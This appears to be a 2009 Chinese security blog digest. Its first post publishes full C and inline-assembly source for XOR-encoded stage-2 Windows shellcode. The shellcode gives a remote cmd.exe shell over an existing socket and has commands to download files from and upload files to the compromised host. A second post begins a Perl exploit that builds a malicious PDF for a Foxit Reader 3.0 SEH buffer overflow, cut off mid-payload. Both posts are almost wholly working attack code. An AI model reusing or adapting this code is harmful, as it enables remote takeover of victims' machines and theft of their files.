2009年3月12日星期四

鬼仔's Blog


来自"鬼仔's Blog"的最新文章,如果您不希望再收到此邮件,请退订;如果您需要更换其它邮箱接收邮件,请点击这里

Fuck The World!

文件上传下载的shellcode

Thu, 12 Mar 2009 21:58:24 +0800

作者:

由于个人职业发展的原因,以后可能不会再深入研究这方面的东西了,只会当作纯粹的兴趣爱好。

我最近都在研究WEB和浏览器安全,以及安全设计方面的工作。所以为了让这些烂在我硬盘里的东西能够更好的发挥作用,能够更加的open,我决定公开这些已经烂掉的东西,也算是对自己过去的一个交代。

shellcode是一项非常具有艺术性的工作,可以对shellcode做加密,可以自己在shellcode里实现 一个协议,可以直接执行一个PE文件,如果是IE里的,可以对抗主动防御,可以通用不挂浏览器,文件型的功能就更多了。

躺在我硬盘里的shellcode太多了,很多我也忘记了原本的功能,也忘记了哪段代码有没有bug,哪段是最新的。如果贴错代码了,就当是POC吧

这里我贴一个简单的上传文件和下载文件的shellcode,如果以前有朋友用过我写的exploit,应该使用过这个功能,在shell里直接可以上传和下载文件。

这段shellcode是一个stage2的shellcode。这种思想是分段发送shellcode,先发送stage1 的shellcode,然后stage1的shellcode会接收stage2 的shellcode去执行。一般来说stage1 的shellcode会短小精悍,stage2 的shellcode则会比较强大。下面的shellcode是stage 2 shellcode的演示.

PS:我以后不会再公开任何漏洞利用的exploit了。

最后,再次向shellcoder们致敬。欢迎和我一起讨论任何技术问题。

/*
author: axis@ph4nt0m.org
Team: Ph4nt0m Security Team (http://www.ph4nt0m.org)
Date: 2007

*/

#include <windows.h>
#include <stdio.h>

#define PROC_BEGIN __asm _emit 0x90 __asm _emit 0x90 __asm _emit 0x90 __asm _emit 0x90\
__asm _emit 0x90 __asm _emit 0x90 __asm _emit 0x90 __asm _emit 0x90
#define PROC_END PROC_BEGIN

#define Xor_key 0x33;

unsigned char sh_Buff[2048];
unsigned int sh_Len;
unsigned int Enc_key=0x99;

unsigned char decode1[] =
/*
00401004   . /EB 0E         JMP SHORT encode.00401014
00401006   $ |5B            POP EBX
00401007   . |4B            DEC EBX
00401008   . |33C9          XOR ECX,ECX
0040100A   . |B1 FF         MOV CL,0FF
0040100C   > |80340B 99     XOR BYTE PTR DS:[EBX+ECX],99
00401010   .^|E2 FA         LOOPD SHORT encode.0040100C
00401012   . |EB 05         JMP SHORT encode.00401019
00401014   > \E8 EDFFFFFF   CALL encode.00401006
*/
"\xEB\x0E\x5B\x4B\x33\xC9\xB1"
"\xFF"          // shellcode size
"\x80\x34\x0B"
"\x99"          // xor byte
"\xE2\xFA\xEB\x05\xE8\xED\xFF\xFF\xFF";

unsigned
char decode2[] =
/* ripped from eyas
00406030   /EB 10           JMP SHORT 00406042
00406032   |5B              POP EBX
00406033   |4B              DEC EBX
00406034   |33C9            XOR ECX,ECX
00406036   |66:B9 6601      MOV CX,166
0040603A   |80340B 99       XOR BYTE PTR DS:[EBX+ECX],99
0040603E ^|E2 FA           LOOPD SHORT 0040603A
00406040   |EB 05           JMP SHORT 00406047
00406042   \E8 EBFFFFFF     CALL 00406032
*/
"\xEB\x10\x5B\x4B\x33\xC9\x66\xB9"
"\x66\x01"      // shellcode size
"\x80\x34\x0B"
"\x99"          // xor byte
"\xE2\xFA\xEB\x05\xE8\xEB\xFF\xFF\xFF";

// kernel32.dll functions index
#define _LoadLibraryA           0x00
#define _CreateProcessA         0x04
#define _TerminateProcess       0x08
//#define _ExitThread             0x08
#define _CreatePipe             0x0C
#define _CreateNamedPipeA       0x10
#define _CloseHandle            0x14
#define _CreateEventA           0x18
#define _WaitForMultipleObjects 0x1C
#define _GetOverlappedResult    0x20
#define _CreateFileA            0x24
#define _ReadFile               0x28
#define _WriteFile              0x2C
#define _WaitForSingleObjectEx 0x30
#define _Sleep                  0x34
// ws2_32.dll functions index
#define _WSAStartup             0x38
#define _WSASocketA             0x3C
#define _setsockopt             0x40
#define _bind                   0x44
#define _listen                 0x48
#define _accept                 0x4C
#define _recv                   0x50
#define _send                   0x54
#define _WSACreateEvent         0x58
#define _WSAEventSelect         0x5C
#define _WSAEnumNetworkEvents   0x60
#define _ioctlsocket            0x64
#define _closesocket            0x68
// data index
#define _lsck                   0x6C
#define _hsck                   0x70    // socket handle
#define _hin0                   0x74    // transferring data to subprocess. incoming handler
#define _hin1                   0x78    // outgoing
#define _hout0                  0x7C    // Create named pipe and open it. incoming handler
#define _hout1                  0x80    // outgoing
#define _pi0                    0x84
#define _pi1                    0x88
#define _epip                   0x8C
#define _esck                   0x90
#define _flg                    0x94
#define _lap                    0x98
#define _cnt                    0xAC
#define _pbuf                   0xB0
#define _sbuf                   0xF0

// functions number
#define _Knums                  14
#define _Wnums                  13

// Need functions
unsigned char functions[100][128] =
{
// kernel32
{"LoadLibraryA"},
{"CreateProcessA"},
{"TerminateProcess"},
//    {"ExitThread"},
{"CreatePipe"},
{"CreateNamedPipeA"},
{"CloseHandle"},
{"CreateEventA"},
{"WaitForMultipleObjects"},
{"GetOverlappedResult"},
{"CreateFileA"},
{"ReadFile"},
{"WriteFile"},
{"WaitForSingleObjectEx"},
{"Sleep"},

// ws2_32
{"WSAStartup"},
{"WSASocketA"},
{"setsockopt"},
{"bind"},
{"listen"},
{"accept"},
{"recv"},
{"send"},
{"WSACreateEvent"},
{"WSAEventSelect"},
{"WSAEnumNetworkEvents"},
{"ioctlsocket"},
{"closesocket"},

// data
{""},
};

void PrintSc(unsigned char *lpBuff, int buffsize);
void ShellCode();

// Get function hash
unsigned long hash(unsigned char *c)
{
unsigned long h=0;
while(*c)
{
h = ( ( h << 25 ) | ( h >> 7 ) ) + *c++;
}
return h;
}

// get shellcode
void GetShellCode()
{
char *fnbgn_str="\x90\x90\x90\x90\x90\x90\x90\x90\x90";
char *fnend_str="\x90\x90\x90\x90\x90\x90\x90\x90\x90";
unsigned char *pSc_addr;
unsigned char pSc_Buff[2048];
unsigned int   MAX_Sc_Len=0x2000;
unsigned long dwHash[100];
unsigned int   dwHashSize;

int l,i,j,k;

// Get functions hash
for (i=0;;i++) {
if (functions[i][0] == '\x0') break;

dwHash[i] = hash(functions[i]);
//fprintf(stderr, "%.8X\t%s\n", dwHash[i], functions[i]);
}
dwHashSize = i*4;

// Deal with shellcode
pSc_addr = (unsigned char *)ShellCode;

for (k=0;k<MAX_Sc_Len;++k ) {
if(memcmp(pSc_addr+k,fnbgn_str, 8)==0) {
break;
}
}
pSc_addr+=(k+8);   // start of the ShellCode

for (k=0;k<MAX_Sc_Len;++k) {
if(memcmp(pSc_addr+k,fnend_str, 8)==0) {
break;
}
}
sh_Len=k; // length of the ShellCode

memcpy(pSc_Buff, pSc_addr, sh_Len);

// Add functions hash
memcpy(pSc_Buff+sh_Len, (unsigned char *)dwHash, dwHashSize);
sh_Len += dwHashSize;

//printf("%d bytes shellcode\n", sh_Len);
// print shellcode
//PrintSc(pSc_Buff, sh_Len);

// find xor byte
for(i=0xff; i>0; i--)
{
l = 0;
for(j=0; j<sh_Len; j++)
{
if (
//                   ((pSc_Buff[j] ^ i) == 0x26) ||    //%
//                   ((pSc_Buff[j] ^ i) == 0x3d) ||    //=
//                   ((pSc_Buff[j] ^ i) == 0x3f) ||    //?
//                   ((pSc_Buff[j] ^ i) == 0x40) ||    //@
((pSc_Buff[j] ^ i) == 0x00) //||
//                   ((pSc_Buff[j] ^ i) == 0x0D) ||
//                   ((pSc_Buff[j] ^ i) == 0x0A) ||
//                   ((pSc_Buff[j] ^ i) == 0x5C)
)
{
l++;
break;
};
}

if (l==0)
{
Enc_key = i;
//printf("Find XOR Byte: 0x%02X\n", i);
for(j=0; j<sh_Len; j++)
{
pSc_Buff[j] ^= Enc_key;
}

break;                        // break when found xor byte
}
}

// No xor byte found
if (l!=0){
//fprintf(stderr, "No xor byte found!\n");

sh_Len = 0;
}
else {
//fprintf(stderr, "Xor byte 0x%02X\n", Enc_key);

// encode
if (sh_Len > 0xFF) {
*(unsigned short *)&decode2[8] = sh_Len;
*(unsigned char *)&decode2[13] = Enc_key;

memcpy(sh_Buff, decode2, sizeof(decode2)-1);
memcpy(sh_Buff+sizeof(decode2)-1, pSc_Buff, sh_Len);
sh_Len += sizeof(decode2)-1;
}
else {
*(unsigned char *)&decode1[7] = sh_Len;
*(unsigned char *)&decode1[11] = Enc_key;

memcpy(sh_Buff, decode1, sizeof(decode1)-1);
memcpy(sh_Buff+sizeof(decode1)-1, pSc_Buff, sh_Len);
sh_Len += sizeof(decode1)-1;
}
}
}

// print shellcode
void PrintSc(unsigned char *lpBuff, int buffsize)
{
int i,j;
char *p;
char msg[4];
printf("/* %d bytes */\n",buffsize);
for(i=0;i<buffsize;i++)
{
if((i%16)==0)
if(i!=0)
printf("\"\n\"");
else
printf("\"");
sprintf(msg,"\\x%.2X",lpBuff[i]&0xff);
for( p = msg, j=0; j < 4; p++, j++ )
{
if(isupper(*p))
printf("%c", _tolower(*p));
else
printf("%c", p[0]);
}
}
printf( "\";\n");
}

// shellcode function
void ShellCode()
{
__asm{

PROC_BEGIN    //C macro to begin proc

jmp     locate_addr
func_start:
pop     edi                             ; get eip
mov     dword ptr [edi+_hsck], eax      //保存stage1传来的socket handle

mov     eax, fs:30h
mov     eax, [eax+0Ch]
mov     esi, [eax+1Ch]
lodsd
mov     ebp, [eax+8]                    ; base address of kernel32.dll

mov     esi, edi

push    _Knums
pop     ecx

GetKFuncAddr:                           ; find functions from kernel32.dll
call    find_hashfunc_addr
loop    GetKFuncAddr

push    3233h
push    5F327377h                       ; ws2_32
push    esp
call    dword ptr [esi+_LoadLibraryA]
mov     ebp, eax                        ; base address of ws2_32.dll
push    _Wnums
pop     ecx

GetWFuncAddr:                           ; find functions from ws2_32.dll
call    find_hashfunc_addr
loop    GetWFuncAddr

push    1                               ; sa.inherit=true
push    0                               ; sa.descriptor=NULL
push    0x0C                            ; sa.sizeof(sa)=0x0c
mov     ebx, esp

push    0xff
push    ebx
lea     edx, [esi+_hin0]
push    edx
add     edx, 4
push    edx
call    dword ptr [esi+_CreatePipe]

push    0x305C
push    0x65706970
push    0x5C2E5C5C                      ; "\\.\pipe\0"
mov     edi, esp

xor     eax, eax
push    eax
push    eax
push    eax
push    eax
push    0xff                            ; UNLIMITED_INSTANCES
push    eax                             ; TYPE_BYTE|READMODE_BYTE|WAIT
push    0x40000003                      ; ACCES_DUPLEX|FLAG_OVERLAPPED
push    edi                             ; pip="\\.\pipe\0"
call    dword ptr [esi+_CreateNamedPipeA]
mov     [esi+_hout1], eax

xor     eax, eax
push    eax
push    eax
push    3                               ; OPEN_EXISTING
push    ebx                             ; lap
push    eax
push    0x02000000                      ; MAXIMUM_ALLOWED
push    edi                             ; pip="\\.\pipe\0"
call    dword ptr [esi+_CreateFileA]
mov     [esi+_hout0], eax

push    646D63h                         ; "cmd"
lea     edx, [esp]

sub     esp, 54h
mov     edi, esp
push    14h
pop     ecx
xor     eax, eax
stack_zero:
mov     [edi+ecx*4], eax
loop    stack_zero

mov     byte ptr [edi+10h], 44h         ; si.cb = sizeof(si)
inc     byte ptr [edi+3Ch]
inc     byte ptr [edi+3Dh]              ; si.flg=USESHOWWINDOW|USESTDHANDLES
push    [esi+_hin1]
pop     ebx
mov     [edi+48h], ebx                  ; si.stdinput
push    [esi+_hout0]
pop     ebx
mov     [edi+4Ch], ebx                  ; si.stdoutput
mov     [edi+50h], ebx                  ; si.stderror
lea     eax, [edi+10h]

push    edi
push    eax
push    ecx
push    ecx
push    ecx
push    1                               ; inherit=TRUE
push    ecx
push    ecx
push    edx                             ; "cmd"
push    ecx
call    dword ptr [esi+_CreateProcessA]

push    [edi]
pop     dword ptr [esi+_pi0]
push    [edi+4]
pop     dword ptr [esi+_pi1]

push    [esi+_hin1]
call    dword ptr [esi+_CloseHandle]
push    [esi+_hout0]
call    dword ptr [esi+_CloseHandle]

add     esp, 0x6C                       ; free sa struct and "\\.\pipe\0" string and si struct

xor     eax, eax
push    eax
push    1
push    1
push    eax
call    dword ptr [esi+_CreateEventA]
mov     [esi+_epip], eax

xor     ebx, ebx
mov     [esi+_lap+0x0C], ebx
mov     [esi+_lap+0x10], eax

call    dword ptr [esi+_WSACreateEvent]    // WSACreateEvent();
mov     [esi+_esck], eax
mov     dword ptr [esi+_flg], 0

k1:
push    0x21                            ; FD_READ|FD_CLOSE
push    [esi+_esck]
push    [esi+_hsck]
call    dword ptr [esi+_WSAEventSelect] // WSAEventSelect(_hsck, _esck, FD_READ|FD_CLOSE);

xor     eax, eax
dec     eax
push    eax
inc     eax
push    eax
lea     ebx, [esi+_epip]
push    ebx
push    2
call    dword ptr [esi+_WaitForMultipleObjects] // WaitForMultipleObjects(2, _epip, FALSE, INFINITE);
push    eax

lea     ebx, [esi+_sbuf]
push    ebx
push    [esi+_esck]
push    [esi+_hsck]
call    dword ptr [esi+_WSAEnumNetworkEvents] // WSAEnumNetworkEvents(_hsck, _esck, _sbuf);

push    0
push    dword ptr [esi+_esck]
push    dword ptr [esi+_hsck]
call    dword ptr [esi+_WSAEventSelect] // WSAEventSelect(_hsck, _esck, 0);

push    0
push    esp
push    0x8004667e
push    [esi+_hsck]
call    dword ptr [esi+_ioctlsocket]
pop     eax

pop     ecx                                     ;
jecxz   k2
dec     ecx
jnz     k5

push    0
push    0x40
lea     edx, [esi+_sbuf]
push    edx
push    [esi+_hsck]
call    dword ptr [esi+_recv]

lea     edx, [esi+_sbuf]
push    eax
pop     ecx          ;ecx字节数
call    xor_data

//+-------------------------------------------
// Add file download and upload function
// 2004-06-09
//
// san
//+-------------------------------------------
cmp     dword ptr [esi+_sbuf], 0xFF746567       ; "get "
jz      get_file
cmp     dword ptr [esi+_sbuf], 0xFF747570       ; "put "
jz      put_file
cmp     DWORD ptr [esi+_sbuf], 0x20786573       ; "sex " sex加空格, 安全退出
jz      k5

restore:
push    0
lea     ebx, [esi+_cnt]
push    ebx
push    eax                                     ; size
lea     ebx, [esi+_sbuf]
push    ebx
push    [esi+_hin0]
call    [esi+_WriteFile]        // WriteFile(_hin0, _sbuf, len, _cnt);

k2:
mov     ecx, [esi+_flg]
jecxz   k3
push    eax
lea     ebx, [esi+_cnt]
push    ebx
lea     ebx, [esi+_lap]
push    ebx
push    [esi+_hout1]
call    dword ptr [esi+_GetOverlappedResult]
xchg    eax, ecx
jecxz   k5
jmp     k4

k3:
lea     ebx, [esi+_lap]
push    ebx
lea     ebx, [esi+_cnt]
push    ebx
push    0x40
lea     ebx, [esi+_pbuf]
push    ebx
push    [esi+_hout1]
call    dword ptr [esi+_ReadFile]
inc     dword ptr [esi+_flg]
test    eax, eax
jz      k1

k4:
lea     edx, [esi+_pbuf]
push    [esi+_cnt]
pop     ecx
call    xor_data

dec     dword ptr [esi+_flg]
push    0
mov     ebx, [esi+_cnt]
push    ebx
lea     ebx, [esi+_pbuf]
push    ebx
push    [esi+_hsck]
call    dword ptr [esi+_send]
jmp     k1

k5:
//int     3
//push    0         //应该可以没有
push    [esi+_pi0]                              // 进程 handler
call    dword ptr [esi+_TerminateProcess]       //结束掉cmd
//        call    dword ptr [esi+_ExitThread]
//        call    DWORD ptr [esi+_ExitProcess]

push    [esi+_pi0]
push    [esi+_pi1]
push    [esi+_hout1]
push    [esi+_hin0]
call    dword ptr [esi+_CloseHandle]
call    dword ptr [esi+_CloseHandle]
call    dword ptr [esi+_CloseHandle]
call    dword ptr [esi+_CloseHandle]

push    [esi+_hsck]
call    dword ptr [esi+_closesocket]

//    xor     eax, eax
//    dec     eax
//    push    eax
//    call    dword ptr [esi+_TerminateProcess]     结束当前进程
//        call    dword ptr [esi+_ExitThread]

// 返回stage1 恢复栈平衡
//int     3
add     esp, 8h
retn

get_file:
//int 3
mov     byte ptr [esi+_sbuf+eax-1], 0
lea     edx, [esi+_sbuf+4]              ; "get " filename
xor     eax, eax
push    eax
push    eax
push    3                               ; OPEN_EXISTING
push    eax                             ; lap
push    eax
push    0x02000000                      ; MAXIMUM_ALLOWED
push    edx                                ; filename
call    dword ptr [esi+_CreateFileA]
//---- 判断文件打开是否成功-------
inc        eax
test    eax, eax
jz        k1
dec        eax
//---------------------------------
mov     [esi+_hout0], eax

transfer:
push    0                               ; null or &lap
lea     edx, [esi+_cnt]
push    edx                             ; read size actualy
push    0x40                            ; read size
lea     edx, [esi+_pbuf]
push    edx
push    [esi+_hout0]
call    dword ptr [esi+_ReadFile]

mov     ecx, [esi+_cnt]
jecxz   transfer_finish                 ; None to read

lea     edx, [esi+_pbuf]
call    xor_data

push    0
push    [esi+_cnt]
lea     edx, [esi+_pbuf]
push    edx
push    [esi+_hsck]
call    dword ptr [esi+_send]

jmp     transfer

transfer_finish:
push    [esi+_hout0]
call    dword ptr [esi+_CloseHandle]

jmp     k1

put_file:
//int 3
mov     byte ptr [esi+_sbuf+eax-1], 0
lea     edx, [esi+_sbuf+4]              ; filename after "put "
xor     eax, eax
push    eax
push    eax
push    2                               ; CREATE_ALWAYS
push    eax                             ; lap
push    eax
push    0x02000000                      ; MAXIMUM_ALLOWED
push    edx                                ; filename
call    dword ptr [esi+_CreateFileA]
//---- 判断文件创建是否成功-------
//inc        eax
//test    eax, eax
//jz        k1
//dec        eax
//--------------------------------
mov     [esi+_hout0], eax

upload:
push    0
push    0x40
lea     edx, [esi+_pbuf]
push    edx
push    [esi+_hsck]
call    dword ptr [esi+_recv]        // recv(_hsck, _pbuf, 64, 0);
//-----------------------------
cmp     dword ptr [esi+_pbuf], 21444E45h // 判断结束字符串END!
jz      upload_finish
//-----------------------------
lea     edx, [esi+_pbuf]
push    eax
pop     ecx
call    xor_data                    // xor_data(_pbuf, len);
push    0
lea     edx, [esi+_cnt]
push    edx
push    eax
lea     edx, [esi+_pbuf]
push    edx
push    [esi+_hout0]
call    dword ptr [esi+_WriteFile]    // WriteFile(_hout0, _pbuf, len, _cnt, 0);

//push    0
//push    esp
//push    4004667Fh
//push    [esi+_hsck]
//call    dword ptr [esi+_ioctlsocket]    // ioctlsocket(_hsck, FIONREAD, &i); i = 0
//pop     ecx
//jecxz   upload_finish

jmp upload

upload_finish:
//int 3
push    [esi+_hout0]
call    dword ptr [esi+_CloseHandle]    // CloseHandle(_hout0);
mov     byte ptr [esi+_sbuf], 0x0a
push    1
pop     eax
jmp     restore

xor_data:
dec     edx
xor_work:
xor     byte ptr [edx+ecx], Xor_key
loop    xor_work
ret

find_hashfunc_addr:
push    ecx
push    esi
mov     esi, [ebp+3Ch]                  ; e_lfanew
mov     esi, [esi+ebp+78h]              ; ExportDirectory RVA
add     esi, ebp                        ; rva2va
push    esi
mov     esi, [esi+20h]                  ; AddressOfNames RVA
add     esi, ebp                        ; rva2va
xor     ecx, ecx
dec     ecx

find_start:
inc     ecx
lodsd
add     eax, ebp
xor     ebx, ebx

hash_loop:
movsx   edx, byte ptr [eax]
cmp     dl, dh
jz      short find_addr
ror     ebx, 7                          ; hash
add     ebx, edx
inc     eax
jmp     short hash_loop

find_addr:
cmp     ebx, [edi]                      ; compare to hash
jnz     short find_start
pop     esi                             ; ExportDirectory
mov     ebx, [esi+24h]                  ; AddressOfNameOrdinals RVA
add     ebx, ebp                        ; rva2va
mov     cx, [ebx+ecx*2]                 ; FunctionOrdinal
mov     ebx, [esi+1Ch]                  ; AddressOfFunctions RVA
add     ebx, ebp                        ; rva2va
mov     eax, [ebx+ecx*4]                ; FunctionAddress RVA
add     eax, ebp                        ; rva2va
stosd                                   ; function address save to [edi]
pop     esi
pop     ecx
retn

locate_addr:
call    func_start

PROC_END      //C macro to end proc

}

}

int main(int argc, char *argv[])
{
unsigned char Buff[2048];

GetShellCode();

PrintSc(sh_Buff, sh_Len);

//PrintSc(Buff, sizeof(Buff));

return 1;
}


发表评论 | 分类:工具收集

© 鬼仔 for 鬼仔's Blog, 2009. | 本文网址:http://huaidan.org/archives/2874.html

相关日志


返回顶部

Foxit Reader 3.0 (< = Build 1301) PDF Buffer Overflow Exploit

Thu, 12 Mar 2009 13:03:20 +0800

#!/usr/bin/perl # # Foxit Reader 3.0 (<= Build 1301) PDF Buffer Overflow Exploit # ------------------------------------------------------------ # Exploit by SkD                          (skdrat@hotmail.com) # # A SEH overflow occurs in this vulnerability in the popular # Foxit Reader. The latest build (1506) is not affected but # previous are. SafeSEH is a bitch in this one, but nothing # is impossible :). # # Exploit written for Windows XP SP3. # # Credits to CORE Sec. # # Note: Author is not responsible for any damage done with this.   use strict; use warnings;  my $pdf_data1 = "\x25\x50\x44\x46\x2D\x31\x2E\x34\x0D\x0A\x25\xA1\xB3\xC5\xD7\x0D\x0A\x31\x20\x30\x20\x6F\x62\x6A\x0D\x0A\x3C\x3C\x2F\x54\x79\x70". 	        "\x65\x2F\x50\x61\x67\x65\x2F\x50\x61\x72\x65\x6E\x74\x20\x34\x20\x30\x20\x52\x20\x2F\x52\x65\x73\x6F\x75\x72\x63\x65\x73\x20\x36". 	        "\x20\x30\x20\x52\x20\x2F\x4D\x65\x64\x69\x61\x42\x6F\x78\x5B\x20\x30\x20\x30\x20\x35\x39\x35\x20\x38\x34\x32\x5D\x2F\x47\x72\x6F". 	        "\x75\x70\x3C\x3C\x2F\x53\x2F\x54\x72\x61\x6E\x73\x70\x61\x72\x65\x6E\x63\x79\x2F\x43\x53\x2F\x44\x65\x76\x69\x63\x65\x52\x47\x42". 	        "\x2F\x49\x20\x74\x72\x75\x65\x3E\x3E\x2F\x43\x6F\x6E\x74\x65\x6E\x74\x73\x20\x32\x20\x30\x20\x52\x20\x2F\x41\x6E\x6E\x6F\x74\x73". 	        "\x5B\x20\x39\x20\x30\x20\x52\x20\x20\x32\x34\x20\x30\x20\x52\x20\x20\x32\x35\x20\x30\x20\x52\x20\x5D\x3E\x3E\x0D\x0A\x65\x6E\x64". 	        "\x6F\x62\x6A\x0D\x0A\x32\x20\x30\x20\x6F\x62\x6A\x0D\x0A\x3C\x3C\x2F\x4C\x65\x6E\x67\x74\x68\x20\x33\x20\x30\x20\x52\x20\x2F\x46". 	        "\x69\x6C\x74\x65\x72\x2F\x46\x6C\x61\x74\x65\x44\x65\x63\x6F\x64\x65\x3E\x3E\x73\x74\x72\x65\x61\x6D\x0D\x0A\x78\x9C\x33\xD0\x33". 	        "\x54\x28\xE7\x2A\x54\x30\x50\x30\x00\xB2\x4C\x2D\x4D\xF5\x8C\x15\x2C\x4C\x0C\xF5\x2C\x15\x8A\x52\x15\xC2\xB5\x14\xF2\xB8\x02\x15". 	        "\x00\x87\xEB\x07\x8A\x0D\x0A\x65\x6E\x64\x73\x74\x72\x65\x61\x6D\x0D\x0A\x65\x6E\x64\x6F\x62\x6A\x0D\x0A\x33\x20\x30\x20\x6F\x62". 	        "\x6A\x0D\x0A\x20\x34\x32\x0D\x0A\x65\x6E\x64\x6F\x62\x6A\x0D\x0A\x34\x20\x30\x20\x6F\x62\x6A\x0D\x0A\x3C\x3C\x2F\x54\x79\x70\x65". 	        "\x2F\x50\x61\x67\x65\x73\x2F\x52\x65\x73\x6F\x75\x72\x63\x65\x73\x20\x36\x20\x30\x20\x52\x20\x2F\x4D\x65\x64\x69\x61\x42\x6F\x78". 	        "\x5B\x20\x30\x20\x30\x20\x35\x39\x35\x20\x38\x34\x32\x5D\x2F\x4B\x69\x64\x73\x5B\x20\x31\x20\x30\x20\x52\x20\x5D\x2F\x43\x6F\x75". 	        "\x6E\x74\x20\x31\x3E\x3E\x0D\x0A\x65\x6E\x64\x6F\x62\x6A\x0D\x0A\x35\x20\x30\x20\x6F\x62\x6A\x0D\x0A\x3C\x3C\x2F\x5A\x69\x54\x69". 	        "\x20\x31\x38\x20\x30\x20\x52\x20\x3E\x3E\x0D\x0A\x65\x6E\x64\x6F\x62\x6A\x0D\x0A\x36\x20\x30\x20\x6F\x62\x6A\x0D\x0A\x3C\x3C\x2F". 	        "\x46\x6F\x6E\x74\x20\x35\x20\x30\x20\x52\x20\x2F\x50\x72\x6F\x63\x53\x65\x74\x5B\x2F\x50\x44\x46\x2F\x54\x65\x78\x74\x5D\x3E\x3E". 	        "\x0D\x0A\x65\x6E\x64\x6F\x62\x6A\x0D\x0A\x37\x20\x30\x20\x6F\x62\x6A\x0D\x0A\x3C\x3C\x2F\x54\x79\x70\x65\x2F\x43\x61\x74\x61\x6C". 	        "\x6F\x67\x2F\x50\x61\x67\x65\x73\x20\x34\x20\x30\x20\x52\x20\x2F\x4F\x70\x65\x6E\x41\x63\x74\x69\x6F\x6E\x5B\x20\x31\x20\x30\x20". 	        "\x52\x20\x2F\x58\x59\x5A\x20\x6E\x75\x6C\x6C\x20\x6E\x75\x6C\x6C\x20\x30\x5D\x2F\x4C\x61\x6E\x67\x28\x65\x6E\x2D\x55\x53\x29\x3E". 	        "\x3E\x0D\x0A\x65\x6E\x64\x6F\x62\x6A\x0D\x0A\x38\x20\x30\x20\x6F\x62\x6A\x0D\x0A\x3C\x3C\x2F\x41\x75\x74\x68\x6F\x72\x28\xFE\xFF". 	        "\x00\x6D\x00\x61\x00\x72\x00\x63\x00\x69\x00\x61\x00\x6E\x00\x6F\x29\x2F\x43\x72\x65\x61\x74\x6F\x72\x28\xFE\xFF\x00\x57\x00\x72". 	        "\x00\x69\x00\x74\x00\x65\x00\x72\x29\x2F\x50\x72\x6F\x64\x75\x63\x65\x72\x28\xFE\xFF\x00\x4F\x00\x70\x00\x65\x00\x6E\x00\x4F\x00". 	        "\x66\x00\x66\x00\x69\x00\x63\x00\x65\x00\x2E\x00\x6F\x00\x72\x00\x67\x00\x20\x00\x33\x00\x2E\x00\x30\x29\x2F\x43\x72\x65\x61\x74". 	        "\x69\x6F\x6E\x44\x61\x74\x65\x28\x44\x3A\x32\x30\x30\x39\x30\x32\x31\x39\x31\x34\x34\x35\x34\x39\x2D\x30\x32\x27\x30\x30\x27\x29". 	        "\x2F\x4D\x6F\x64\x44\x61\x74\x65\x28\x44\x3A\x32\x30\x30\x39\x30\x32\x31\x39\x31\x34\x34\x38\x31\x35\x2D\x30\x32\x27\x30\x30\x27". 	        "\x29\x3E\x3E\x0D\x0A\x65\x6E\x64\x6F\x62\x6A\x0D\x0A\x31\x35\x20\x30\x20\x6F\x62\x6A\x0D\x0A\x3C\x3C\x2F\x54\x79\x70\x65\x2F\x46". 	        "\x69\x6C\x65\x73\x70\x65\x63\x2F\x46\x28\x63\x75\x61\x6C\x71\x75\x69\x65\x72\x61\x29\x2F\x46\x53\x2F\x55\x52\x4C\x3E\x3E\x0D\x0A". 	        "\x65\x6E\x64\x6F\x62\x6A\x0D\x0A\x31\x34\x20\x30\x20\x6F\x62\x6A\x0D\x0A\x3C\x3C\x2F\x53\x2F\x4D\x43\x44\x2F\x43\x54\x28\x61\x70". 	        "\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E\x2F\x66\x75\x74\x75\x72\x65\x73\x70\x6C\x61\x73\x68\x29\x2F\x50\x3C\x3C\x2F\x54\x46\x28\x54". 	        "\x45\x4D\x50\x41\x43\x43\x45\x53\x53\x29\x3E\x3E\x2F\x44\x20\x31\x35\x20\x30\x20\x52\x20\x3E\x3E\x0D\x0A\x65\x6E\x64\x6F\x62\x6A". 	        "\x0D\x0A\x31\x33\x20\x30\x20\x6F\x62\x6A\x0D\x0A\x3C\x3C\x2F\x53\x2F\x4D\x52\x2F\x43\x20\x31\x34\x20\x30\x20\x52\x20\x2F\x4E\x28". 	        "\x63\x75\x61\x6C\x71\x75\x69\x65\x72\x61\x29\x3E\x3E\x0D\x0A\x65\x6E\x64\x6F\x62\x6A\x0D\x0A\x31\x32\x20\x30\x20\x6F\x62\x6A\x0D". 	        "\x0A\x3C\x3C\x2F\x54\x79\x70\x65\x2F\x41\x63\x74\x69\x6F\x6E\x2F\x53\x2F\x52\x65\x6E\x64\x69\x74\x69\x6F\x6E\x2F\x4F\x50\x20\x34". 	        "\x2F\x41\x4E\x20\x39\x20\x30\x20\x52\x20\x2F\x52\x20\x31\x33\x20\x30\x20\x52\x20\x3E\x3E\x0D\x0A\x65\x6E\x64\x6F\x62\x6A\x0D\x0A". 	        "\x31\x31\x20\x30\x20\x6F\x62\x6A\x0D\x0A\x3C\x3C\x2F\x54\x79\x70\x65\x2F\x45\x78\x74\x47\x53\x74\x61\x74\x65\x2F\x43\x41\x20\x31". 	        "\x2F\x63\x61\x20\x31\x2F\x41\x49\x53\x20\x66\x61\x6C\x73\x65\x3E\x3E\x0D\x0A\x65\x6E\x64\x6F\x62\x6A\x0D\x0A\x31\x30\x20\x30\x20". 	        "\x6F\x62\x6A\x0D\x0A\x3C\x3C\x2F\x4D\x61\x74\x72\x69\x78\x5B\x20\x31\x20\x30\x20\x30\x20\x31\x20\x30\x20\x30\x5D\x2F\x42\x42\x6F". 	        "\x78\x5B\x20\x30\x20\x30\x20\x31\x33\x30\x2E\x31\x33\x39\x20\x32\x37\x2E\x32\x38\x39\x37\x5D\x2F\x52\x65\x73\x6F\x75\x72\x63\x65". 	        "\x73\x3C\x3C\x2F\x45\x78\x74\x47\x53\x74\x61\x74\x65\x3C\x3C\x2F\x49\x6D\x61\x67\x65\x4F\x70\x61\x63\x69\x74\x79\x20\x31\x31\x20". 	        "\x30\x20\x52\x20\x3E\x3E\x3E\x3E\x2F\x4C\x65\x6E\x67\x74\x68\x20\x35\x34\x2F\x46\x69\x6C\x74\x65\x72\x2F\x46\x6C\x61\x74\x65\x44". 	        "\x65\x63\x6F\x64\x65\x3E\x3E\x73\x74\x72\x65\x61\x6D\x0D\x0A\x78\x9C\x2B\xE4\x2A\xE4\x32\x50\x00\xC1\xA2\x74\x30\xC3\xD0\xD8\x40". 	        "\xCF\xD0\xD8\x52\xC1\xC8\x5C\xCF\xC8\xC2\xD2\x5C\xA1\x28\x95\xCB\x50\x01\x08\x8D\x2C\x20\xC2\xA6\x70\xE1\x34\x2D\xAE\x40\x20\x04". 	        